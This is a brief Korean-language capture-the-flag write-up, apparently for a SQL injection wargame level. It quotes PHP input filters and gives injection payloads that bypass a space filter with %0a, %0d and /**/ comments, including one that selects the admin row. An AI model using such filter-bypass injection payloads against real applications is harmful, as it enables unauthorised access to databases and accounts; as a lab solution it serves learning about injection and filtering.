Write-Up
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");
위의 필터링에 의해 공백(%20)이 필터링된다. 그러므로 아래와 같이 %0a로 공백 필터링을 우회해 주었다.
?pw=%27or%0a1=1%23
+plus
?pw=%27or/**/1=1%23
?pw=%27or%0d1=1%23
?pw=1%27or%0aid%0alike%0a%27admin%27%23
